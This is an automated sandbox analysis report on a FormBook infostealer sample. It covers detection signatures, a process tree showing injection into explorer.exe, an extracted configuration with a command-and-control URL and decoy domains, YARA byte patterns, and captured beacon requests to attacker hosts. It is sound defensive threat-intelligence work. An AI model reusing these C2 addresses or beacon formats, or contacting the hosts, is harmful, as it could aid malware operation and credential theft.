Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Variant.Jaik.72878.10638.10974

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Jaik.72878.10638.10974 (renamed file extension from 10974 to exe)
Analysis ID:626276
MD5:69250f55fbfe48822c838b4eeaf33a0a
SHA1:3e4e1dd9dbeb98ec354f7a03d455a0a38ccea4e5
SHA256:752d0155c769033832d6845eabba29bce2b9d0eedff734b31a49c879ed08ff72
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Variant.Jaik.72878.10638.exe (PID: 6960 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe" MD5: 69250F55FBFE48822C838B4EEAF33A0A)
    • fdvucso.exe (PID: 6992 cmdline: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp MD5: 8CA00DF697FFA200C6CA558754C49F37)
      • fdvucso.exe (PID: 7008 cmdline: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp MD5: 8CA00DF697FFA200C6CA558754C49F37)
        • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmd.exe (PID: 6324 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • cmd.exe (PID: 2700 cmdline: /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 3376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.worklifefirewalls.com/m9y5/"], "decoy": ["cryptocurrenciesmarketcaps.com", "legaslktiy3.xyz", "cardhj.com", "zouoolaa.xyz", "yjy888.com", "modernboatsalesnadservice.xyz", "zeirishiyamasaki.com", "jamesture.com", "wwwcharleys.com", "walletsw.com", "mbbpaymentplan.com", "lume24.com", "steelonsite.com", "digihm.solutions", "desertunicorns.com", "marbepay.com", "vvv678.com", "73154.xyz", "qzbozhijy.com", "daometalaunch.com", "asproclub.com", "jobeta.net", "whusab.xyz", "delivery-074812.xyz", "magicportriat.com", "floridacommercialprinting.com", "jogodobicho.top", "acessesiteonline01.online", "lakrkajz.xyz", "medicalmassageofpalmbeaches.com", "trendylifeco.com", "upliftpropertysolutions.com", "discountbestdeals.com", "antoniolorenzo.com", "etheteroad.com", "atukr.icu", "xinli-ac.com", "hhydlxs.com", "megabandar.xyz", "olyards.com", "likeama.com", "homes.equipment", "rscall.center", "mayonline.online", "trq-advisors.com", "growyourown.center", "citzensinfo.com", "modernerkredit.com", "chitbucket.com", "kookpedal.com", "tatahotsauce.com", "steadywoman.com", "rfpconsultants.xyz", "insurancecentral.info", "appalachianfamilies.com", "boywhocode.xyz", "a-superb-us-retro-clothes.fyi", "meandmsjones.online", "pastoreemilio.com", "emprendemente.online", "erminelair.com", "doudou-ssr.net", "credit.cool", "dgengcase.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.fdvucso.exe.a70000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.fdvucso.exe.a70000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.fdvucso.exe.a70000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        2.0.fdvucso.exe.400000.6.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.0.fdvucso.exe.400000.6.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.worklifefirewalls.com/m9y5/"], "decoy": ["cryptocurrenciesmarketcaps.com", "legaslktiy3.xyz", "cardhj.com", "zouoolaa.xyz", "yjy888.com", "modernboatsalesnadservice.xyz", "zeirishiyamasaki.com", "jamesture.com", "wwwcharleys.com", "walletsw.com", "mbbpaymentplan.com", "lume24.com", "steelonsite.com", "digihm.solutions", "desertunicorns.com", "marbepay.com", "vvv678.com", "73154.xyz", "qzbozhijy.com", "daometalaunch.com", "asproclub.com", "jobeta.net", "whusab.xyz", "delivery-074812.xyz", "magicportriat.com", "floridacommercialprinting.com", "jogodobicho.top", "acessesiteonline01.online", "lakrkajz.xyz", "medicalmassageofpalmbeaches.com", "trendylifeco.com", "upliftpropertysolutions.com", "discountbestdeals.com", "antoniolorenzo.com", "etheteroad.com", "atukr.icu", "xinli-ac.com", "hhydlxs.com", "megabandar.xyz", "olyards.com", "likeama.com", "homes.equipment", "rscall.center", "mayonline.online", "trq-advisors.com", "growyourown.center", "citzensinfo.com", "modernerkredit.com", "chitbucket.com", "kookpedal.com", "tatahotsauce.com", "steadywoman.com", "rfpconsultants.xyz", "insurancecentral.info", "appalachianfamilies.com", "boywhocode.xyz", "a-superb-us-retro-clothes.fyi", "meandmsjones.online", "pastoreemilio.com", "emprendemente.online", "erminelair.com", "doudou-ssr.net", "credit.cool", "dgengcase.com"]}
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exeVirustotal: Detection: 41%Perma Link
          Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exeReversingLabs: Detection: 43%
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.fdvucso.exe.a70000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fdvucso.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.fdvucso.exe.a70000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fdvucso.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Machine Learning detection for sample
          Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exeJoe Sandbox ML: detected
          Source: 2.0.fdvucso.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.fdvucso.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.fdvucso.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.fdvucso.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.fdvucso.exe.a70000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\lmwlf\ciwera\wcsu\ec524832ab3648f5b1c9c3185cc05774\hsjgbq\tqrenmhx\Release\tqrenmhx.pdb source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe, 00000000.00000002.454080692.0000000000789000.00000004.00000001.01000000.00000003.sdmp, fdvucso.exe, 00000001.00000000.430396179.000000000119E000.00000002.00000001.01000000.00000004.sdmp, fdvucso.exe, 00000001.00000002.440272687.000000000119E000.00000002.00000001.01000000.00000004.sdmp, fdvucso.exe, 00000002.00000000.433738219.000000000119E000.00000002.00000001.01000000.00000004.sdmp, cmd.exe, 0000000D.00000002.695116331.000000000335F000.00000004.10000000.00040000.00000000.sdmp, nsmCEB5.tmp.0.dr, fdvucso.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: fdvucso.exe, 00000001.00000003.438551302.000000001A540000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000001.00000003.434608426.000000001A6D0000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515050798.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.441575692.0000000001354000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.439819748.00000000011B4000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515766558.000000000160F000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694158511.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.515945671.0000000000BC9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.514406903.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694414486.0000000000E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: fdvucso.exe, 00000002.00000002.516194872.0000000003200000.00000040.10000000.00040000.00000000.sdmp, fdvucso.exe, 00000002.00000003.513191387.0000000001041000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694963571.0000000001100000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000D.00000000.513997856.0000000001100000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: fdvucso.exe, 00000001.00000003.438551302.000000001A540000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000001.00000003.434608426.000000001A6D0000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515050798.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.441575692.0000000001354000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.439819748.00000000011B4000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515766558.000000000160F000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000D.00000002.694158511.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.515945671.0000000000BC9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.514406903.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694414486.0000000000E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: fdvucso.exe, 00000002.00000002.516194872.0000000003200000.00000040.10000000.00040000.00000000.sdmp, fdvucso.exe, 00000002.00000003.513191387.0000000001041000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694963571.0000000001100000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000D.00000000.513997856.0000000001100000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 4x nop then pop edi

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 170.75.150.177 80
          Source: C:\Windows\explorer.exeDomain query: www.lume24.com
          Source: C:\Windows\explorer.exeDomain query: www.cryptocurrenciesmarketcaps.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.186.238.101 80
          Source: C:\Windows\explorer.exeDomain query: www.qzbozhijy.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.worklifefirewalls.com/m9y5/
          Source: Joe Sandbox ViewASN Name: QUICKPACKETUS QUICKPACKETUS
          Source: global trafficHTTP traffic detected: GET /m9y5/?GDHDO=orMzR/RfXnMhfSAyBjBjnR1lGR+TvkHzuwdFBkAhJBLh1eKTDfMMMN4zoKLE4Jh6elIQ&2d0tk4=7nxxAXLHM4 HTTP/1.1Host: www.qzbozhijy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9y5/?GDHDO=nj3oxEIT1zdIdiXK9EykkBiMkkzJg0Of7VGGA4YdAoGVUT4DfIqyC+XPG7GpV3gppNhE&2d0tk4=7nxxAXLHM4 HTTP/1.1Host: www.cryptocurrenciesmarketcaps.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 13 May 2022 17:45:29 GMTContent-Type: text/htmlContent-Length: 291ETag: "627e693c-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: cmd.exe, 0000000D.00000002.695248264.000000000384F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
          Source: cmd.exe, 0000000D.00000002.695248264.000000000384F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
          Source: unknownDNS traffic detected: queries for: www.qzbozhijy.com
          Source: global trafficHTTP traffic detected: GET /m9y5/?GDHDO=orMzR/RfXnMhfSAyBjBjnR1lGR+TvkHzuwdFBkAhJBLh1eKTDfMMMN4zoKLE4Jh6elIQ&2d0tk4=7nxxAXLHM4 HTTP/1.1Host: www.qzbozhijy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m9y5/?GDHDO=nj3oxEIT1zdIdiXK9EykkBiMkkzJg0Of7VGGA4YdAoGVUT4DfIqyC+XPG7GpV3gppNhE&2d0tk4=7nxxAXLHM4 HTTP/1.1Host: www.cryptocurrenciesmarketcaps.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeCode function: 0_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.fdvucso.exe.a70000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fdvucso.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.fdvucso.exe.a70000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fdvucso.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.fdvucso.exe.a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.fdvucso.exe.a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.fdvucso.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.fdvucso.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.fdvucso.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.fdvucso.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.fdvucso.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.fdvucso.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.fdvucso.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.fdvucso.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.fdvucso.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.fdvucso.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
